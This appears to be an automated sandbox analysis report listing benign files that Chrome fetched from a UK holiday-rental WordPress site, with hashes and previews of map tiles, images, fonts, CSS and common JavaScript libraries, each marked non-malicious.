              Preview:google.maps.__gjsload__('map', function(_){var xta=function(a){try{return _.pa.JSON.parse(a)}catch(b){}a=String(a);if(/^\s*$/.test(a)?0:/^[\],:{}\s\u2028\u2029]*$/.test(a.replace(/\\["\\\/bfnrtu]/g,"@").replace(/(?:"[^"\\\n\r\u2028\u2029\x00-\x08\x0a-\x1f]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?)[\s\u2028\u2029]*(?=:|,|]|}|$)/g,"]").replace(/(?:^|:|,)(?:[\s\u2028\u2029]*\[)+/g,"")))try{return eval("("+a+")")}catch(b){}throw Error("Invalid JSON string: "+a);},yta=function(){var a=_.cr();return _.Ii(a.Gg,18)},zta=function(){var a=._.cr();return _.H(a.Gg,17)},Ata=function(a,b){return a.Eg?new _.Dm(b.Eg,b.Fg):_.Em(a,_.kr(_.lr(a,b)))},Bta=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Cta=function(a){return new Promise((b,c)=>{window.requestAnimationFrame(()=>{try{a?_.nn(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attem
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with no line terminators
              Category:downloaded
              Size (bytes):40
              Entropy (8bit):4.296439344671015
              Encrypted:false
              SSDEEP:
              MD5:71BD4F6565CB3990D81F69096A7BC288
              SHA1:C82FC098AA72ABC1450B446B729AF9E1C5508BF6
              SHA-256:2294CEF77CE0207BC74879FDAB43A96D4C1EFC287A02C3AE4D390698ADA3DD92
              SHA-512:10120C0934AFFAAD28B25EF3974C1C6BEA468F20BD95CE493A18F8304BC20A925C38B1FC8C722F14DF89825F8F634F4CD2FCC71701B3CA019A697C03CB8C4873
              Malicious:false
              Reputation:unknown
              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSHgknQTw5N6Pj_RIFDRvYrr8SBQ2e5J0tEgUNQcQpfQ==?alt=proto
              Preview:ChsKBw0b2K6/GgAKBw2e5J0tGgAKBw1BxCl9GgA=
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 256x256, components 3
              Category:downloaded
              Size (bytes):14216
              Entropy (8bit):7.938377270824109
              Encrypted:false
              SSDEEP:
              MD5:6BA385DFDD9AA7704C1B23C2C79190A6
              SHA1:7335B4C20F3DC32B983065096A44FCA2B3E2831F
              SHA-256:61F111506732ECD6AF7F60CA5311AF67B4B1082B1235664AE7DBEF49FCC6740E
              SHA-512:E3578A94898D4F10084BA040B24126B5ABA3A39621A6BD894A335AEFAEDA7BE572B9C77A1CE94394EDDE3F069C8ED5F2868A4CAC22A7BA3185484625A5AA0E47
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i9!2i251!3i166!4i256!2m1!1e1!3m12!2sen!3sGB!5e289!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmx8cC52Om9mZg!4e0!5m1!1e3!23i47083502&client=google-maps-embed&token=43309
              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..,t../....,.+FB.H#..T#..d....T.BRLy}pG ....=.....*.9.z./J...R..=.\...Cm..Yr.q#.....1Wn....N.OS..T.....F(........K.X.....;.9.9....K]H.$E..y.....U..t..!..V...A.2t..q.M;.&.d-.9..l...G.JD!......j...d.c?1..z..&..s.;.8.....$;...s...X..L. ........A.uB.;.......H..Z...5..tp.p.t....=.Hb.M........k..d%..P...z...-.+.J."..$..v..*tgDe..._..Z.s...A.u.....@8..~.6.9...t.T.N.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):8816
              Entropy (8bit):7.964455245305572
              Encrypted:false
              SSDEEP:
              MD5:93DEE18B3FE49E73E219992F72CCE1E4
              SHA1:0B883118D1D0AA8A887A7921173D23D0A13E7153
              SHA-256:56893702889CA925AFAA689AE887064AF38465D8738B862E94EDB6ADC43801B9
              SHA-512:D840121829847995F25982949193C6B62AE15C80CD12258598DEE5FD023AEAE96377D926ED921E003216E8862A2396E8DD38FF86F8D731438EE674EBE005E570
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4017!3i2658!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=89050
              Preview:RIFFh"..WEBPVP8L["../..?...*.m%..x.rQ.H......#I....wy......8.m.z...K. .8.Y.;_.?2.C?2|......S.mn..}......T..Y...s.{........h.....o..x9...e.7..(.._.j...V.>.bV.:l-Jm*TYM.<U..w......N..N.E.Z>.[.X.....mmo.f.6......g.\.Hl*t..KF. .@....C..f_z.AUD.G~....8.f4.j...q{<... .^"I..qI.fZ..-)+Y..9EN...@.aFKlj..S.....v.$.r.QA.x%(.."T...xC{e.\..b,t..ly.`..-.BS.y.$...;...j....\.-h<....sy.u0..`....K$b.DT.M.g.<.yW.)tS2...*........Y.....Jv.a....\....n..PfI8.`h6.E.c.u0CR...#.s..@p.?..H..B.Lk..iMQ.. ..2..0.U....n.v....T..6.'..$....;....c..}.j..[HW........ V.(........BU.....5.fi....m-@...g.b-.,l...}........d..8.p/~R/"...U....M.......H..k,.X..ci.....e$e. .LD..$.....c...$.Xu.....:..hM(....b.I#.....Q$Q...jryU.'..K.j..f.<hZg8W....;..IA1...I.,.m:.hj...U)M.r.K[J+..FIV."..MI.$..yi.Q..x2.P....].64.l0..n.p..1.i...(.hR......v.T.(f......b..tq..I..i.t....i.A...FA....E...f...L.L.e.h...F.q.4.q.`2.}.4!b.`....DX..... ..!K.MD...hSPFp..'....7,.. .... ....=..g.7....<iqB..a.y...
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):13330
              Entropy (8bit):7.979112354640955
              Encrypted:false
              SSDEEP:
              MD5:E58F55149AE1C7818356E1A1E5DDC5E9
              SHA1:67C1A42C066CE5846B00C175B1A3F2ECE140B785
              SHA-256:B133D0F0E4365DFD64AA57A13AA4258A5078AA8556110005C9D336A120513F95
              SHA-512:F25EECBD5004668457416A31A69A7A059BE20A4FE8FB62809E73F0DAD58CE9064E4947A493FA43FF4F2839C32455126080CA7898D9BEBEB5FB369AB1EB8DAC98
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4015!3i2657!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=24866
              Preview:RIFF.4..WEBPVP8L.3../..?...6.m...-v...HI.R..z^.l#.V..Dd.jL..J74@.O...D..n..@N..=UL....../.E.......~n. ....`f........?.........O. @...~.D.....~.A.^..n.P..I..f.......~..w]g.u....tvead...X..8W.ncL.-..x0>...-.3.z.N.....s.<.W..6z.}.].R.%_M.J.2.s.:...W.u./.....8.^S.(4..$..$.<D. ...A.GMY.=.DJ..w.g..%.t..5@fddJ.....I....U.U......[Wg..Fw{._.47Q.Ps..>(n.r.:....03M./.EN..................dh.H.1'..,...Q..8.Gr..]o:....t.`Vr.i..,<k.cf.=........w3..=/3.&.......Q..n......\z.^...=<....X...:>.S]OD...o.Jb.....|..e..|..h._..|`.yx.n.'.:....-.F..Shz.;.....B...1..mO..nU\.i?.|V~.{.......0O....7.2.<......*.._[...af..=.y0...`...{.]..............-c....v..-..\..t..{>..-O.!O<......?.........]c$...".....tY.o.......&^<..~..kS.oK....2k}..V.....o.......O.@.wvdp..~....o_.../.......`m...2......u.(..o.6..{]r<..i...._....5C{.^.i....n.H...o..C..1..71.x....W...k.t...6c../2....k..._..m.J.Zh.......|..i...d.....i'-".#.;..3..).#....p.k.y2.0}.m...g%.L..t..o..e .t.f,.........`*.s.`,.|..o...
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 1536x1024, components 3
              Category:dropped
              Size (bytes):199654
              Entropy (8bit):7.965933928561124
              Encrypted:false
              SSDEEP:
              MD5:87B7396D688763E8F16B2B7BE1944D94
              SHA1:902BD1BB75BA4E4A468BEF38E3C866C87FA32DB0
              SHA-256:41A4DCB31F9747EBE5C766FB45B4CFDC8F82362A3E3DFA74E46FA5BD33CFEEDD
              SHA-512:8D8E9626F836992AD8EE4752B95023B32A9D779A38925A922D007FE8EEA6300C3F77823D26D1D1D5E90A31C3091AC737637D2329545675838086E0087C65B28B
              Malicious:false
              Reputation:unknown
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......J.eq.H..#Q.8....3@.4.i..(...)zP1.).....).....`8S..R.@<S.0S..c.E4.p.V.)i.8S...p.Q.x..(..H.8..P).P)..)q@..@..b.R.1....i@.."....p...R....b.P.b.S.}(.cqG.i.Q..LQ.1E......7.b.I@..LS.. ..NjLRP1...I..7......1(.-..JZ(...(.0....%-...........-".(..m8.C....H)sE.(Zp....V.b.@ijl4...h4...8.vi..f.C..J)....W.R.4f
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):14408
              Entropy (8bit):7.978409800896306
              Encrypted:false
              SSDEEP:
              MD5:60C70762B8C407E4B2395183753433A1
              SHA1:28BF8A285DA686C9B8796148FCAB55DE6DC1237B
              SHA-256:A14F49CA7D945A3344A15AED550DA1CD0D36A3F7BB1CA8E8F689870231B1DAFD
              SHA-512:9B23A7C7702A9331E84F7AFCB920D20D4A4C9F6D567FDCD1BDE857F085446774FDE9F11D12C05CFCBA16EF0C5C7F556D296963563EB1E6FE5E73334F9F26CE4C
              Malicious:false
              Reputation:unknown
              Preview:RIFF@8..WEBPVP8L48../..?...mU9Op."..*D!...z...:5.G..*...A.$.....{...m'y.9g..\.>...9..w...1.44.=a........#..!g.....:h.S..fZ.....`dY.-6..i.'.Fc...N_FC..i...T....Z.[.oT.U.J.CBrN.#...0...LS0g6.@.K.2...'.u.c!.~..>........m.'..l..Y../......'B'.'.'.j.b..d..)........z....:.......H......f..._.B..c.......V.@..v.m.OG..(...........sY...;.m%........d?......b...1k%K.^...X................x.4.xD...`.....G@..4........6.<....Uf..=.<.....n...3>........s...I;...,O.4..B.zh;;..g..i...YK.h.a.w..;.....;..X.h..2K..3<.B.=!.......`f2...~....'..?Y...[..F./..d.=7j;.c.,O,...+.r.k...(.Q....o..:.:'..x@.F.v..l..=o6".......:s..3...M....o3V...am ........G!..!)X@+..m.okd..E...7..NB....r.......Z%g...x...3<....8T.^.......)....L.l.....t....p..w\g.c.C_.....r/.f.-sK..R...%p...A.....2<!0<......&.W(@..b.o..e?............S.p.......In......b~?N .(...7....?.#.?.....?..d.h;G.c2:.vQG.r....+..:.7J|g...(.Z..).o..........}XX..."..5Y.PE....IX.......*>..?..I..v..'...."..8a...C..I.[O..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):22304
              Entropy (8bit):4.43533789396671
              Encrypted:false
              SSDEEP:
              MD5:98CFAFF5980CC8064A3D4B881D524474
              SHA1:8D76E6196959D23A8FC8B273D56EA0BFAE6E56FB
              SHA-256:52F78F3FC70CBD2FFFD18D57F826B668DFE0C178C718603A4A5C925DF263C7F3
              SHA-512:DD0CC0EC6E1FEE41DE60CE1A143B8E3674EEED9C7034C4EFE76BD98529D6D2CCBF9F686DAE010063C08A48922DBB2C987D8CBD995106A0660D7F5058160E6C76
              Malicious:false
              Reputation:unknown
              Preview:const getFirstDayOfMonth = (year, month) => {. return new Date(year, month, 1);.}../**. * It adds a click event listener to each link in the tabs, and when clicked, it removes the active. * class from all tabs and tab content, and then adds the active class to the clicked tab and its. * corresponding tab content. */.const MetaboxRoomTabs = () => {. const roomID = hotel_settings.room_id;. if ( roomID == 0 ) return;.. const url = new URL(document.URL);. const linkTabs = document.querySelectorAll('.wphb-meta-box__room-tab__tabs li a');. const elemTabs = document.querySelectorAll('.wphb-meta-box__room-tab__tabs li');. const elemContent = document.querySelectorAll('.wphb-meta-box-room-panels');. .. // show tab active when update post;. const tabActive = window.localStorage.getItem('tabActive');. url.searchParams.set('tab', tabActive);. window.history.pushState( '', '', url.href );. // end show tab active when update post;.. if ( linkTabs.length == 0
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):4346
              Entropy (8bit):7.9552520218167535
              Encrypted:false
              SSDEEP:
              MD5:4B799C103BF8AAF2ACE102504D633770
              SHA1:20F752437824FF8AF780544DE66382BBE06052ED
              SHA-256:3ED49828B543F7424688595670CBA82CB0F3285C27E345298751D0A412882FFB
              SHA-512:B4915E1C155E88C357D6A9290DC72CFF097E1FF25DC5788D27E204DEB170F3C17F86ADE150B8181499401D969992095BED1D72280861C6B17EB45E80C4C85B27
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4020!3i2657!4i256!2m3!1e0!2sm!3i710461637!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=39742
              Preview:RIFF....WEBPVP8L..../..?...&..$s.......z......!B).EhD..'...8..T.w8S.A...Y...G.........'.....@}..e.d.V9`...K.kLJ.,5.k2I'r...ow..|..6...,..s.d..A.m.Q.!..A.....7.%...S~..?DIV.J.\..p.......e...,J#..&..]/4I.`+..*q.`j.z...>P,T.-.D..5.8...ZS..!....4..............e.....#.#!........-.....U..0.).8Hu.&.z...t.. .%.X..y4:LC0.V..&L...5...y2.kq...h.d>4 .}...+.f..2?s..?)...........s5.U..........G.....*.h.RuW&;....E2K..hK..W&+..n....mp.."..8Q....E..E..M\.Y:$"4..^,.K.C.rh..x.>s@..`.pB.*....Uqv...9H5.%.wrB..z.......l.K.s_.C.N.T..}g5J.:.b....$_.....`...lp.......-L[...8y........'.^"..'...j..&.6...^.....n..K>..D}_i.z...G.-..R.=...hj.yqo..F.R.XD*..*yA....Va..&Z.tA.Z.......m..g.x.!.{..uAN.L.7..7.?...V.n"IsI.v>H..n.Ua...U1kD.*....:.3 .?8....|.f.e./Gl.........@:aZ.....E.*.H.......J...i.5G...~.I,".. q.....l.:4RY...\.,....v]{.P3..nC|u6|.[5\s)h.MY....._o.U...(M.a.?G..B..]3.Y..*MQc.....Q..-..7.u.:..S......1I..!v...IO...#<...l...".m....'([}Jg.D..+^}.".....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):4387
              Entropy (8bit):4.45318816781137
              Encrypted:false
              SSDEEP:
              MD5:D8374E7ED0BB48E38CE451D639298ECE
              SHA1:05763671603A767E96E0B6738054C45AAB175FB3
              SHA-256:A26A8747ADD0CBE9BE375656F5C9E9C8CF01E73757495CACFA88089C8FD39F7C
              SHA-512:10E8D45B6514E8C1A1CC1A38BD89A587CF70769D9C07B95096CA3BD508529D1F45DEA6E76EB97F6480C29909C7C40D9884C26B341C09899086746861B673FC1B
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/custom-animate.css?ver=1726496070
              Preview:..@keyframes rotateMe {.. from {.. transform: rotate(0deg) scale(1);.. }.. to { .. transform: rotate(360deg);.. }..}..@-webkit-keyframes rotateMe {.. from {.. transform: rotate(0deg) scale(1);.. }.. to { .. transform: rotate(360deg);.. }..}..@-moz-keyframes rotateMe {.. from {.. transform: rotate(0deg) scale(1);.. }.. to { .. transform: rotate(360deg);.. }..}..@-o-keyframes rotateMe {.. from {.. transform: rotate(0deg) scale(1);.. }.. to { .. transform: rotate(360deg);.. }..}....@keyframes rotateMe {.. from {.. transform: rotate(0deg) scale(1);.. }.. to { .. transform: rotate(360deg);.. }..}....@-webkit-keyframes ScaleMe {.. 0% {.. transform: scale(1);.. }.... 50% {.. transform: scale(1.15);.. }.... 100% {.. transform: scale(1);.. }..}..@-moz-keyframes ScaleMe {.. 0% {.. transform: scale(1);.. }.... 50% {.. transform
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (20831), with CRLF line terminators
              Category:dropped
              Size (bytes):21007
              Entropy (8bit):5.218241715782147
              Encrypted:false
              SSDEEP:
              MD5:D504F567785F24C3122B66D0A652B525
              SHA1:89EBB972B527C88BAC8016BD5F296A3A96141105
              SHA-256:B43B803D36936E2DAD7548992C02DFA7144D50B22624211596347A492BFD2C8B
              SHA-512:A28FF3CFBE9CE1D542DCE7F24AF949BD8DCAACA1471EAF3134D87BD4FFB8948B361937797E0FC59C4107B8AA100DCF87EE790D1F2453129F9A13AD27CD1BD0C5
              Malicious:false
              Reputation:unknown
              Preview:/*.. Copyright (C) Federico Zivolo 2019.. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT)... */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){return 11===e?pe:10===e?se:pe||se}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:null,n=e.offsetParent||null;n===o&&e.nextElementSibling
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Web Open Font Format (Version 2), TrueType, length 76736, version 331.-31196
              Category:downloaded
              Size (bytes):76736
              Entropy (8bit):7.997372822381554
              Encrypted:true
              SSDEEP:
              MD5:ED311C7A0ADE9A75BB3EBF5A7670F31D
              SHA1:0613C7EBBA55EE47EF302C0F7766324692F899A7
              SHA-256:8EA8791754915A898A3100E63E32978A6D1763BE6DF8E73A39D3A90D691CDEEF
              SHA-512:6048E7AB94134B7200F0D5ED7FB8D577298D4831A2B3A4E0E5BAA5C67468F77D4409314D63D34436BA6BA038C86FAF87E46DACF98D311A74291B976FA39A9674
              Malicious:false
              Reputation:unknown
              URL:https://use.fontawesome.com/releases/v5.15.4/webfonts/fa-brands-400.woff2
              Preview:wOF2......+........`..+f.K.$....................?FFTM....`..z.....<..".6.$..,..... .....][.q..".z$.n"...ZUcb...F.n...g1^p\.8..[=.....$..!..G|..B.UUk.:..8..R..Uz...a.....m......D.ax...r.v.,....l...GyrH.Ap...R..z.s..^.H.|XIx.7..U".e...tXL[.nO..k.,o..."...6...U.}x...M.~.W...h.@..d........u....Y`.Mw.z.'#(....!.....s..%..O. Ep.... [.@..ra.95...C.....9.!...I.G.C.....#..g.....8o.&?.x8.nN.].e..'4..7...I..{.>.?..6e..ht.g.C}..}..)../^..>:,Yh..Ba$.R.....=....].PBQ..Y.hA..&.X......5$.......R&.*jb.......B.....V......E.ER.F..RVD..h..P.l..T....81..3..;...........d4........H\R..lx~n..fcc..zE........i .( .......z.WV].w^..W....f.L..K6@.@h.uE........3.R....VI<......c.kBL.B'.C;.0...3.........B.|P..7{...J4.......%$.,N.`.....UP..;i|.'A......X>.s];e_(.p.D.}.....y~9........d.rF..L.R..... ....`RC.v.....T.._...h..S........@.{H..N....TR...f}\:\..U...RC@R..fbh2...a..r.O.{..+..?.Sa.6p.............fH7.t......./q.g...p..OW.......t. .,p.....42....h@...k...o......_.....o:.a...FlXP..P>..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (26516)
              Category:downloaded
              Size (bytes):26702
              Entropy (8bit):4.830054856017398
              Encrypted:false
              SSDEEP:
              MD5:A034D3C71BEE546F625877D7932917F8
              SHA1:F217D4DED0BC9F786BD9BA1C09CE88AEDBAED76E
              SHA-256:8FE2F1CB7BC41C640AD3EA24449CFA1BA5291E16DBBBAB0EF61BFE43F3212910
              SHA-512:7C76AF9016F2FE0705101DAD69A05F1B40CB747446AE7BE4590357559E586FF163E8B92881E71051DEA8CAF055B2B58F6874B1B39B4DCDAE8B516FD8E80CFD95
              Malicious:false
              Reputation:unknown
              URL:https://use.fontawesome.com/releases/v5.15.4/css/v4-shims.css?ver=2.0.3
              Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa.fa-glass:before{content:"\f000"}.fa.fa-meetup{font-family:"Font Awesome 5 Brands";font-weight:400}.fa.fa-star-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-file-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arrow-circle-o-down:before{content:"\f358"}.fa.fa-arrow-circle-o-up{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arr
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (5461)
              Category:dropped
              Size (bytes):5496
              Entropy (8bit):5.2395265487321785
              Encrypted:false
              SSDEEP:
              MD5:96912016BBFE7071BED99F871BC6FE62
              SHA1:4AFEFF3994395A4F54DDBD330391A72C713EB4A4
              SHA-256:93781AD228A73792C7336B0E02A03E1A5DAFA104D2E90C07BDC9CC2C8085BA76
              SHA-512:5612CDC31BB05FB0190709F9C83F4EF888A0851EF7F0D1B7FF2911D9607613EE62CC7784DD49A188C0E6F1C2AF407C660B2055F3656D9D5383FFEED2581CDD56
              Malicious:false
              Reputation:unknown
              Preview:/*! This file is auto-generated */.(()=>{"use strict";var e={d:(t,r)=>{for(var n in r)e.o(r,n)&&!e.o(t,n)&&Object.defineProperty(t,n,{enumerable:!0,get:r[n]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};e.d(t,{default:()=>T});const r=window.wp.i18n;const n=function(e){const t=(e,r)=>{const{headers:n={}}=e;for(const o in n)if("x-wp-nonce"===o.toLowerCase()&&n[o]===t.nonce)return r(e);return r({...e,headers:{...n,"X-WP-Nonce":t.nonce}})};return t.nonce=e,t},o=(e,t)=>{let r,n,o=e.path;return"string"==typeof e.namespace&&"string"==typeof e.endpoint&&(r=e.namespace.replace(/^\/|\/$/g,""),n=e.endpoint.replace(/^\//,""),o=n?r+"/"+n:r),delete e.namespace,delete e.endpoint,t({...e,path:o})},a=e=>(t,r)=>o(t,(t=>{let n,o=t.url,a=t.path;return"string"==typeof a&&(n=e,-1!==e.indexOf("?")&&(a=a.replace("?","&")),a=a.replace(/^\//,""),"string"==typeof n&&-1!==n.indexOf("?")&&(a=a.replace("?","&")),o=n+a),r({...t,url:o})})),s=window.wp.url;function i(e,t){return Promise.resolve(t?e.body:
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Web Open Font Format (Version 2), TrueType, length 18492, version 1.0
              Category:downloaded
              Size (bytes):18492
              Entropy (8bit):7.988005025098439
              Encrypted:false
              SSDEEP:
              MD5:7FDA4C62C1BDEAE7A08E6FD438104BAC
              SHA1:B1F626E78F5F6D7BE993303A49EB81F0FA4CE57C
              SHA-256:4DBD328E347E890A801D51F9A5F8D38A3EFD51EC34C0AA22CC83D0A95D6D9D71
              SHA-512:C4A36A3C1FF23023533DFF103A108844B7CFE4E793ABA0B1B5576431E77DD6E9EDF29FAD68132577AD6AD55CA7A011A38723DA2FA15D9071D2C6BA4E02D1DADC
              Malicious:false
              Reputation:unknown
              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fBBc4.woff2
              Preview:wOF2......H<..........G..............................Z..|.`..J.X..<.....P..N..Z...x.6.$..0. ..|. ..:...%l.F.......T.mZ..V.n!.53.l.@..N....CD.!f......I.(;..Cw.2L..@....M....(.H*].......1..I&..tE.e....D...}y..6D.h.Z..$y.J.X._....J2 .*(.....=M..+Hd*.Y.6.f.J.z..:.........#.#...3..;.<..q./.,g.tK.Y.Ne.?......1.b.......S.".~..|Q.9.1Q.Y.^....MkF......;v..g(.(S...Z.>...l.XW.Z....-Q.h..MR8$..W(..Wh.0....X..;]3...:..\/..L...L.U...6".h?K.....A.....(2z.uRTn...GaJ......+..4..d...I.[!..Ua..x..4.,@..t....3.e..J._'..R.j.p.t...`.4.......aI,.....W..9V..K..c..... g...:.........'..6.O.0+..;Q..&..e..=..sg......Eg.2.R.M..{{w.{{'4.L.O2.L$) ;..`....PeW..O..iS..e..S.l... .....R.R.+.!.uLUE~...C.JN..J.r...@..g..:.\..;..s.n.s........sq4... ;..N.`.H<T.....p.#2.e....H..T...........1....^......L.....R...R.1.!............E..m_Z~....z..L..j....".q~..Pg!X}1.q.!.n......@.d...._5=..*x.......[.y.#$Q.d.........j...1n.....&...-(N..P\5<.f.qB..|.i...q<.'..C.A...\.i.x.9........1.>....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 1920 x 90, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):104024
              Entropy (8bit):7.970550403932585
              Encrypted:false
              SSDEEP:
              MD5:487AD291A052A6B2E7C54DF60AE3681B
              SHA1:9B8F87378069839CED19AE6DC446596183E67265
              SHA-256:10A1308853E631B82AC077FACD3E9DC2E5D0CE87B2CEA9E72EFA9708B14D3834
              SHA-512:815E042AF153769EE5D5BE1A2543F2F7663DBE4C3A5F62DC13FC01EF9540BDBEBBE25E50714E84EFE142B6A31BBA6546BAFEE623667A177E030C203D32CD874F
              Malicious:false
              Reputation:unknown
              Preview:.PNG........IHDR.......Z.....Y.K.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmpMM:OriginalDocumentID="xmp.did:8123eb9b-07c2-9a4c-9488-c51c15428c53" xmpMM:DocumentID="xmp.did:DDFF37BE8F6311EAACADFA4A167BD008" xmpMM:InstanceID="xmp.iid:3e252c7a-7ba9-3547-b483-594aa1c6d1b9" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmp:CreateDate="2020-05-06T11:36:07+05:00" 